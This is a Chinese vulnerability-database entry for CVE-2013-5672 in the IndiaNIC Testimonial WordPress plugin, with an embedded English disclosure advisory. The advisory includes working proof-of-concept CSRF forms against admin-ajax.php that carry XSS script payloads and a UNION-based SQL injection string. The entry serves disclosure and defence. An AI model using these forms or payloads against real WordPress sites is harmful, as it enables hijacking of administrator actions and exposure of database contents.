WordPress IndiaNIC Testimonial插件跨站请求伪造漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1121846 漏洞类型 跨站请求伪造
发布时间 2013-09-03 更新时间 2013-09-03
CVE编号 CVE-2013-5672 CNNVD-ID CNNVD-201308-550
漏洞平台 PHP CVSS评分 6.8
|漏洞来源
https://www.exploit-db.com/exploits/28054
https://www.securityfocus.com/bid/62109
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-201308-550
|漏洞详情
WordPress是WordPress软件基金会的一套使用PHP语言开发的博客平台,该平台支持在PHP和MySQL的服务器上架设个人博客网站。IndiaNICTestimonial是其中的一个博客评论插件。WordPress的IndiaNICTestimonial插件2.2版本中存在多个跨站请求伪造漏洞。远程攻击者可利用这些漏洞劫持通过授权的管理员发送的多个请求,包括:(1)通过iNIC_testimonial_save操作添加一个证明;(2)通过iNIC_testimonial_save_listing_template操作添加列出模板;(3)通过iNIC_testimonial_save_widget操作添加窗口小工具模板。借助多个参数传递到wp-admin/admin-ajax.php脚本利用该漏洞插入跨站脚本序列。这些参数包括:project_name,project_url,client_name,client_city,client_state,description,tags,video_url,is_featured,title,widget_title,no_of_testimonials,filter_by_country,filter_by_tags,widget_template。
|漏洞EXP
Details
========================
Application: Testimonial
Version: 2.2
Type: Wordpress plugin
Vendor: IndiaNIC
Vulnerability:
- XSS (CWE-79)
- CSRF (CWE-352)
- SQL Injection (CWE-89)

Description
========================
Testimonial Plugin allows you to add, delete, edit and place what others said about your web site. Loaded with unequaled features, this plugin gets you complete control over testimonials.

This is the very first Plug-in which is designed especially keeping our motto in mind that ‘every client is important’. It is as an imperative tool for supervising your official website in accordance to your clients.

Vulnerability
========================
This plugin is vulnerable to cross-site request forgery, cross-site scripting and sql injection.

1. Add testimonial form is vulnerable to CSRF and XSS
2. Add listings template is vulnerable to CSRF, XSS and SQLi
3. Add widget template is vulnerable to CSRF and XSS

Proof of Concept
========================
1. Add testimonial 
<form name="testimonial_add" method="post" action="http://wordpress/wp-admin/admin-ajax.php">
    <input type="hidden" name="action" value="iNIC_testimonial_save">
    <input type="hidden" name="project_name" value="<script>alert(String.fromCharCode(67,83,82,70,32,49))</script>">
    <input type="hidden" name="project_url" value="<script>alert(String.fromCharCode(67,83,82,70,32,50))</script>">
    <input type="hidden" name="client_name" value="<script>alert(String.fromCharCode(67,83,82,70,32,51))</script>">
    <input type="hidden" name="client_city" value="<script>alert(String.fromCharCode(67,83,82,70,32,52))</script>">
    <input type="hidden" name="client_state" value="<script>alert(String.fromCharCode(67,83,82,70,32,53))</script>">
    <input type="hidden" name="client_country" value="Belgium">
    <input type="hidden" name="description" value="<script>alert(String.fromCharCode(67,83,82,70,32,54))</script>">
    <input type="hidden" name="tags" value="<script>alert(String.fromCharCode(67,83,82,70,32,55))</script>">
    <input type="hidden" name="video_url" value="<script>alert(String.fromCharCode(67,83,82,70,32,56))</script>">
    <input type="hidden" name="is_featured" value="<script>alert(String.fromCharCode(67,83,82,70,32,57))</script>">
    <input type="submit" value="Save Testimonial">
</form>

2. Add listings template
<form name="testimonial_add" method="post" action="http://wordpress/wp-admin/admin-ajax.php">
    <input type="hidden" name="action" value="iNIC_testimonial_save_listing_template">
    <input type="hidden" name="id" value="9">
    <input type="hidden" name="title" value="<script>alert(String.fromCharCode(67,83,82,70,32,49))</script>">
    <input type="hidden" name="no_of_testimonial" value="5">
    <input type="hidden" name="list_per_page" value="5">
    <input type="hidden" name="ord_by" value="id">
    <input type="hidden" name="ord_type" value="ASC">
    <input type="hidden" name="custom_query" value="1=1) union select 1,2,3,@@version,5,6,7,8,9,10,11,12,13,14#">
    <input type="hidden" name="show_featured_at" value="top">
    <input type="hidden" name="no_of_featured" value="2">
    <input type="hidden" name="featured_template" value="{#ID} {#ProjectUrl} {#ProjectName} {#ProjectUrl} {#ClientName} {#City} {#State} {#Country} {#Description} {#Tags} {#VideoUrl} {#ThumbImgUrl} {#LargeImgUrl} {#Counter}">
    <input type="hidden" name="listing_template_odd" value="{#ID} {#ProjectUrl} {#ProjectName} {#ProjectUrl} {#ClientName} {#City} {#State} {#Country} {#Description} {#Tags} {#VideoUrl} {#ThumbImgUrl} {#LargeImgUrl} {#Counter}">
    <input type="hidden" name="listing_template_even" value="{#ID} {#ProjectUrl} {#ProjectName} {#ProjectUrl} {#ClientName} {#City} {#State} {#Country} {#Description} {#Tags} {#VideoUrl} {#ThumbImgUrl} {#LargeImgUrl} {#Counter}">
    <input type="submit" value="Add Template">
</form>

3. Add widget template
<form name="testimonial_add" method="post" action="http://wordpress/wp-admin/admin-ajax.php">
    <input type="hidden" name="action" value="iNIC_testimonial_save_widget">
    <input type="hidden" name="widget_title" value="<script>alert(String.fromCharCode(67,83,82,70,32,49))</script>">
    <input type="hidden" name="no_of_testimonials" value="<script>alert(String.fromCharCode(67,83,82,70,32,50))</script>">
    <input type="hidden" name="filter_by_country" value="<script>alert(String.fromCharCode(67,83,82,70,32,51))</script>">
    <input type="hidden" name="filter_by_tags" value="<script>alert(String.fromCharCode(67,83,82,70,32,52))</script>">
    <input type="hidden" name="widget_template" value="<script>alert(String.fromCharCode(67,83,82,70,32,53))</script>">
    <input type="submit" value="Add Template">
</form>

Solution
========================
No patch has been provided by vendor. Solution would be to stop using this plugin in a public environment

Timeline
========================
2013-08-07 - Email sent to IndiaNIC
2013-08-08 - Notification left on the plugin's Support board on wordpress.org
2013-09-01 - No response or patch released. Publicly disclosed
|受影响的产品
IndiaNIC Testimonial 2.2
|参考资料

来源:XF
名称:indianictestimonial-cve20135672-csrf(86846)
链接:http://xforce.iss.net/xforce/xfdb/86846
来源:BID
名称:62109
链接:http://www.securityfocus.com/bid/62109
来源:EXPLOIT-DB
名称:28054
链接:http://www.exploit-db.com/exploits/28054
来源:SECUNIA
名称:54640
链接:http://secunia.com/advisories/54640
来源:MLIST
名称:[oss-security]20130901Re:[CVERequest]IndiaNICTestimonial2.2WPplugin
链接:http://seclists.org/oss-sec/2013/q3/531
来源:FULLDISC
名称:20130901IndiaNICTestimonialWPplugin-Multiplevulnerabilities
链接:http://seclists.org/fulldisclosure/2013/Sep/5
来源:packetstormsecurity.com
链接:http://packetstormsecurity.com/files/123036
来源:OSVDB
名称:96792
链接:http://osvdb.org/96792
来源:BUGTRAQ
名称:20130901IndiaNICTestimonailWPplugin-Multiplevulnerabilities
链接:http://archives.neohapsis.com/archives/bugtraq/2013-09/0006.html